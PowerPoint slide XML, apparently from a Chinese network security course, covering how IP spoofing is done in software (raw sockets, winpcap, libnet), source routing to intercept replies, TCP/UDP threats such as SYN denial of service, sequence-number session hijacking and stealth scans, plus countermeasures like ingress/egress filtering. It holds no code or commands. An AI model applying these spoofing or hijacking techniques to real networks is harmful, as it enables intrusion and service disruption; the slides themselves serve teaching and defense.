              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>平台上，不能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Winsock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>winpcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>libnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只能发送数据包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>收不到回包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防火墙可能阻挡</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227330" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用程序实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7960E309-0538-4AB3-99DF-BDD707887AB9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42805133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7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273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273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73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273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73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7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a:t>攻击者插入响应数据包的通信路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>源路由：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据包路由由源主机指定。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>严格源路由：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据包必须按序经过源路由指定的每一个路由器，不得有其他路由器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>宽松源路由选择：在指定的路由器之间可以有其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址的路由器。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>截获响应数据包</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142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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06" y="4725144"/>
            <a:ext cx="8999298" cy="986433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1834797006"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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主机保护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防止自己机器被利用实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>物理防护、登录口令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>权限控制，不允许修改配置信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防止自己机器成为假冒对象：无能为力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络防护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由器设置欺骗过滤，不具普适性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入口过滤，外来包带有内部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>出口过滤，内部包带有外部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>禁止源路由</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗对策</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143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3781796685"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传输层安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3960932760"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议的安全威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三次握手中源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址可以虚假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拒绝服务攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的序列号并不真正随机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以定制所发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的标志位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐蔽扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议的安全威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无连接、不可靠的协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拒绝服务攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传输层协议的安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="978261226"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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104"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="657225" y="6289675"/>
            <a:ext cx="635000" cy="252413"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 62893"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/>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5" name="Rectangle 105"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="6164263"/>
            <a:ext cx="1225550" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFF99"/>
          </a:solidFill>
          <a:ln w="1905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6" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="928688" y="1697038"/>
            <a:ext cx="15875" cy="2757487"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg2"/>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Rectangle 107"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="638175" y="2767013"/>
            <a:ext cx="587375" cy="53022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a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>首部</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79878" name="Line 108"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8453438" y="1690688"/>
            <a:ext cx="0" cy="2316162"/>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9" name="Rectangle 109"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8002588" y="2509838"/>
            <a:ext cx="1073150" cy="53022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a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>字节的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>固定首部</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79880" name="Rectangle 110"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1217613" y="1695450"/>
            <a:ext cx="6810375" cy="2763838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="2540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81" name="Freeform 111"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1227138" y="4459288"/>
            <a:ext cx="6826250" cy="757237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4626"/>
              <a:gd name="T1" fmla="*/ 0 h 544"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 4626"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 544"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 4626"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 544"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 4626"/>
              <a:gd name="T7" fmla="*/ 0 h 544"/>
              <a:gd name="T8" fmla="*/ 0 w 4626"/>
              <a:gd name="T9" fmla="*/ 0 h 544"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 4626"/>
              <a:gd name="T16" fmla="*/ 0 h 544"/>
              <a:gd name="T17" fmla="*/ 4626 w 4626"/>
              <a:gd name="T18" fmla="*/ 544 h 544"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="4626" h="544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="861" y="544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1814" y="544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4626" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="B2B28E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FFFFCC"/>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79882" name="Line 112"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1211263" y="2165350"/>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3" name="Line 113"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223963" y="2630488"/>
            <a:ext cx="68087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114"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1211263" y="3094038"/>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115"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1211263" y="3557588"/>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116"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223963" y="4022725"/>
            <a:ext cx="68087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117"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4624388" y="1700213"/>
            <a:ext cx="0" cy="4746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Rectangle 118"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5688013" y="1785938"/>
            <a:ext cx="13366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目  的  端  口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79889" name="Rectangle 119"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354138" y="3035300"/>
            <a:ext cx="5873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数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>偏移</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79890" name="Rectangle 120"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2309813" y="3649663"/>
            <a:ext cx="11334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检   验   和</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79891" name="Rectangle 121"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2489200" y="4078288"/>
            <a:ext cx="283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选    项    （长  度  可  变）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79892" name="Rectangle 122"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="1785938"/>
            <a:ext cx="1019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源  端  口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79893" name="Rectangle 123"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4230688" y="2244725"/>
            <a:ext cx="7699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序   号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79894" name="Line 124"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
